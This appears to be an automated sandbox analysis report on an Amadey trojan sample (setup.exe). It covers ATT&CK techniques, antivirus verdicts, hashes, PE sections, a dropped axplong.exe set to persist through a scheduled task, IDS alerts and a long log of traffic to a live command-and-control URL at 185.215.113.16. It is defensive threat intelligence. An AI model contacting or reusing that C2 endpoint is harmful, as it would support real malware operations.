                  Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 12 Process Injection | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 251 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 224 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Source | Detection | Scanner | Label | Link
                  setup.exe | 55% | ReversingLabs | Win32.Packed.Generic |
                  setup.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                  setup.exe | 100% | Joe Sandbox ML | |
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 58% | ReversingLabs | Win32.Trojan.Amadey |
                  No Antivirus matches
                  No Antivirus matches
                  No contacted domains info
                  Name | Malicious | Antivirus Detection | Reputation
                  http://185.215.113.16/Jo89Ku7d/index.php | true | Avira URL Cloud: phishing | unknown
                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                  185.215.113.16 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1483214
                  Start date and time:2024-07-26 21:01:05 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 39s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:19
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:setup.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@4/3@0/1
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target axplong.exe, PID 4600 because there are no executed function
                  • Execution Graph export aborted for target setup.exe, PID 4476 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: setup.exe
                  Time | Type | Description
                  16:32:02 | API Interceptor | 1475077x Sleep call for process: axplong.exe modified
                  21:01:59 | Task Scheduler | Run new task: axplong path: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  185.215.113.16 | setup.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | setup.exe | malicious | Amadey, SmokeLoader | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | file.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | file.exe | malicious | Amadey, Babadeda, RedLine, Stealc, Vidar | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | 6SoKuOqyNh.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | EXyAlLKIck.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | IRqsWvBBMc.exe | malicious | Amadey, Vidar | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | file.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | JGKjBsQrMc.exe | malicious | Amadey, Babadeda, RedLine, Stealc, Vidar | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | PE1dBCFKZv.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                  No context
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  WHOLESALECONNECTIONSNL | setup.exe | malicious | Amadey | 185.215.113.19
                  WHOLESALECONNECTIONSNL | setup.exe | malicious | Amadey | 185.215.113.16
                  WHOLESALECONNECTIONSNL | setup.exe | malicious | Amadey, SmokeLoader | 185.215.113.16
                  WHOLESALECONNECTIONSNL | setup.exe | malicious | Amadey | 185.215.113.19
                  WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 185.215.113.16
                  WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Babadeda, RedLine, Stealc, Vidar | 185.215.113.16
                  WHOLESALECONNECTIONSNL | file.exe | malicious | RedLine | 185.215.113.9
                  WHOLESALECONNECTIONSNL | file.exe | malicious | RedLine | 185.215.113.9
                  WHOLESALECONNECTIONSNL | 6SoKuOqyNh.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 185.215.113.16
                  WHOLESALECONNECTIONSNL | SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe | malicious | Amadey | 185.215.113.19
                  No context
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | file.exe | malicious | Amadey, Babadeda, RedLine, Stealc, Vidar |
                    Process:C:\Users\user\Desktop\setup.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1939456
                    Entropy (8bit):7.9495212303989495
                    Encrypted:false
                    SSDEEP:49152:rWKMHFWJsNZi1WEzbfyDchLRg2ci2zjYlBwK:rWNlWS0dbfkQL22cJzsrV
                    MD5:C6620FE2690605F20F5B9C970E8130C6
                    SHA1:F5A500BAB75CEC90F2A004566CC61EF6484BE12C
                    SHA-256:EE170A14D676B69CAB768F8A94E482EE9AD6DC1766038D6E26C24FE2CFBD7677
                    SHA-512:C9D30D3000F27D6E2A49A6491CE31E371A6235D53E3E22D3B69D50A932F230F1C425C37AD4E64925418B590933FB4F79C391C895F31C91171930696B37AAFBAB
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 58%
                    Joe Sandbox View:
                    • Filename: file.exe, Detection: malicious, Browse
                    Reputation:low
                    Process:C:\Users\user\Desktop\setup.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    Process:C:\Users\user\Desktop\setup.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):308
                    Entropy (8bit):3.5318333830177413
                    Encrypted:false
                    SSDEEP:6:RawtDspQZX2JUEZ+lX1lOJUPelkDdtcVAkXIEZ8MlW8+y0l1XWt0:RDBsil2JQ1lOmeeDhkXd8kX+V1Gt0
                    MD5:9072C1891241FC6A1E2C897EE3143D3D
                    SHA1:0D43DA8589FEA65BC2377F1BD4AD5F0A1CB23C90
                    SHA-256:08957B827290F305098C21A4D5889DA9044F751584F906EECC037C942C4B6616
                    SHA-512:B4FCBBDBD8756EF0377938341AEF2AFA445CE0C3FE219F20C8AB60802D71281B02EBA02DFA383286F1BAEEFF76C44A82F5CC27A453CDAB7E4D9E334537C6E17B
                    Malicious:false
                    Reputation:low
                    Preview:..........B..x/t>7.F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0...................@3P.........................
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.9495212303989495
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:setup.exe
                    File size:1'939'456 bytes
                    MD5:c6620fe2690605f20f5b9c970e8130c6
                    SHA1:f5a500bab75cec90f2a004566cc61ef6484be12c
                    SHA256:ee170a14d676b69cab768f8a94e482ee9ad6dc1766038d6e26c24fe2cfbd7677
                    SHA512:c9d30d3000f27d6e2a49a6491ce31e371a6235d53e3e22d3b69d50a932f230f1c425c37ad4e64925418b590933fb4f79c391c895f31c91171930696b37aafbab
                    SSDEEP:49152:rWKMHFWJsNZi1WEzbfyDchLRg2ci2zjYlBwK:rWNlWS0dbfkQL22cJzsrV
                    TLSH:12953343C97EA759C01B8F7ADAF04D0D944457CE83B2A94E8AEA313B9F07709C572E85
                    Icon Hash:00928e8e8686b000
                    Entrypoint:0x8cf000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Instruction
                    jmp 00007FE0B483819Ah
                    pcmpeqd mm3, qword ptr [00000000h]
                    add cl, ch
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a057 | 0x6b | .idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x1e0 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4cdc1c | 0x10 | etmksbbt
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x4cdbcc | 0x18 | etmksbbt
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    (unnamed) | 0x1000 | 0x68000 | 0x2de00 | 837d4004497acf47a949832b2b516f3b | False | 0.9973284230245232 | data | 7.979174049479235 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc | 0x69000 | 0x1e0 | 0x200 | f0ebcd8b851d264baff6e4a1fe2ebfe5 | False | 0.583984375 | data | 4.5213398196219154 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata | 0x6a000 | 0x1000 | 0x200 | cc76e3822efdc911f469a3e3cc9ce9fe | False | 0.1484375 | data | 1.0428145631430756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    (unnamed) | 0x6b000 | 0x2bb000 | 0x200 | 7cc8aeb4594ec064fae4e8fef6034e13 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    etmksbbt | 0x326000 | 0x1a8000 | 0x1a7e00 | 70ad7bb7edf340d073d078bfeda46580 | False | 0.9945282549395459 | data | 7.953652307689506 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    iosnleeh | 0x4ce000 | 0x1000 | 0x400 | 5edd199957207b670bde157329d2fde1 | False | 0.8134765625 | data | 6.245417276981024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant | 0x4cf000 | 0x3000 | 0x2200 | 856f329ab316ef634c85a6f2f3158669 | False | 0.06721047794117647 | DOS executable (COM) | 0.7663652277382772 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_MANIFEST0x4cdc2c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                    DLLImport
                    kernel32.dlllstrcpy
                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States
                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                    2024-07-26T21:02:19.708198+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970040.68.123.157192.168.2.7
                    2024-07-26T21:02:41.265101+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34971080192.168.2.7185.215.113.16
                    2024-07-26T21:02:33.652832+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34970480192.168.2.7185.215.113.16
                    2024-07-26T21:02:58.425645+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972540.68.123.157192.168.2.7
                    2024-07-26T21:02:37.109665+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34970780192.168.2.7185.215.113.16
                    2024-07-26T21:02:46.154334+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34971480192.168.2.7185.215.113.16
                    2024-07-26T21:02:38.302527+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34970880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:02.898155928 CEST4972980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:03.003676891 CEST4972980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:03.003899097 CEST4973080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:03.009042025 CEST8049729185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:03.009160042 CEST4972980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:03.009459972 CEST8049730185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:03.009547949 CEST4973080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:03.009795904 CEST4973080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:03.014632940 CEST8049730185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:03.762062073 CEST8049730185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:03.762192011 CEST4973080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:03.829514027 CEST4973080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:03.834856033 CEST8049730185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:04.076719999 CEST8049730185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:04.076857090 CEST4973080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:04.381273031 CEST4973080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:04.381592035 CEST4973180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:04.387729883 CEST8049731185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:04.387834072 CEST4973180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:04.387967110 CEST4973180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:04.389254093 CEST8049730185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:04.389306068 CEST4973080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:04.404294968 CEST8049731185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:05.187845945 CEST8049731185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:05.187964916 CEST4973180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:05.188930988 CEST4973180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:05.199032068 CEST8049731185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:05.446070910 CEST8049731185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:05.446177006 CEST4973180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:05.550313950 CEST4973180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:05.551099062 CEST4973280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:05.559497118 CEST8049732185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:05.559683084 CEST4973280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:05.559901953 CEST4973280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:05.569350958 CEST8049731185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:05.569431067 CEST4973180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:05.569689989 CEST8049732185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:06.368269920 CEST8049732185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:06.368503094 CEST4973280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:06.371474981 CEST4973280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:06.376858950 CEST8049732185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:06.641664028 CEST8049732185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:06.641815901 CEST4973280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:06.756035089 CEST4973280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:06.756402969 CEST4973380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:06.761507034 CEST8049733185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:06.761538982 CEST8049732185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:06.761606932 CEST4973380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:06.761751890 CEST4973380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:06.761789083 CEST4973280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:06.785466909 CEST8049733185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:07.552160978 CEST8049733185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:07.552290916 CEST4973380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:07.570028067 CEST4973380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:07.574826956 CEST8049733185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:07.823013067 CEST8049733185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:07.823138952 CEST4973380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:07.925894976 CEST4973380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:07.926222086 CEST4973480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:07.932106018 CEST8049734185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:07.932204008 CEST4973480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:07.932327032 CEST4973480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:07.937216997 CEST8049734185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:07.937594891 CEST8049733185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:07.937639952 CEST4973380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:08.722975969 CEST8049734185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:08.723072052 CEST4973480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:08.725752115 CEST4973480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:08.730662107 CEST8049734185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:08.976841927 CEST8049734185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:08.976929903 CEST4973480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:09.081708908 CEST4973480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:09.081937075 CEST4973580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:09.088757992 CEST8049735185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:09.088854074 CEST4973580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:09.088984966 CEST4973580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:09.089493990 CEST8049734185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:09.089555025 CEST4973480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:09.094265938 CEST8049735185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:09.862994909 CEST8049735185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:09.864087105 CEST4973580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:09.864087105 CEST4973580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:09.869452953 CEST8049735185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:10.143987894 CEST8049735185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:10.144108057 CEST4973580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:10.262696028 CEST4973580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:10.267168045 CEST4973680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:10.268172026 CEST8049735185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:10.268500090 CEST4973580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:10.272511005 CEST8049736185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:10.272727966 CEST4973680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:10.327955961 CEST4973680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:10.334296942 CEST8049736185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:11.032474041 CEST8049736185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:11.032608986 CEST4973680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:11.062325954 CEST4973680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:11.068806887 CEST8049736185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:11.317271948 CEST8049736185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:11.317348957 CEST4973680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:11.425338984 CEST4973680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:11.425683975 CEST4973780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:11.430535078 CEST8049737185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:11.430619955 CEST4973780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:11.430704117 CEST4973780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:11.431648970 CEST8049736185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:11.431694031 CEST4973680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:11.436016083 CEST8049737185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:12.172636986 CEST8049737185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:12.172705889 CEST4973780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:12.173414946 CEST4973780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:12.178523064 CEST8049737185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:12.419078112 CEST8049737185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:12.419164896 CEST4973780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:12.534734964 CEST4973780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:12.535139084 CEST4973880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:12.540662050 CEST8049738185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:12.540827990 CEST4973880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:12.540992975 CEST4973880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:12.541564941 CEST8049737185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:12.541611910 CEST4973780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:12.546540976 CEST8049738185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:13.309009075 CEST8049738185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:13.309077024 CEST4973880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:13.309773922 CEST4973880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:13.315782070 CEST8049738185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:13.559909105 CEST8049738185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:13.560009956 CEST4973880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:13.675244093 CEST4973880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:13.675602913 CEST4973980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:13.680965900 CEST8049739185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:13.681066990 CEST4973980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:13.681185007 CEST4973980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:13.682442904 CEST8049738185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:13.682501078 CEST4973880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:13.686496019 CEST8049739185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:14.420831919 CEST8049739185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:14.420969963 CEST4973980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:14.421703100 CEST4973980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:14.427567959 CEST8049739185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:14.675081015 CEST8049739185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:14.675271988 CEST4973980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:14.784647942 CEST4973980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:14.785083055 CEST4974080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:14.789866924 CEST8049739185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:14.789895058 CEST8049740185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:14.789946079 CEST4973980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:14.790013075 CEST4974080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:14.790150881 CEST4974080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:14.794884920 CEST8049740185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:15.583616972 CEST8049740185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:15.583688974 CEST4974080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:15.584462881 CEST4974080192.168.2.7185.215.113.16
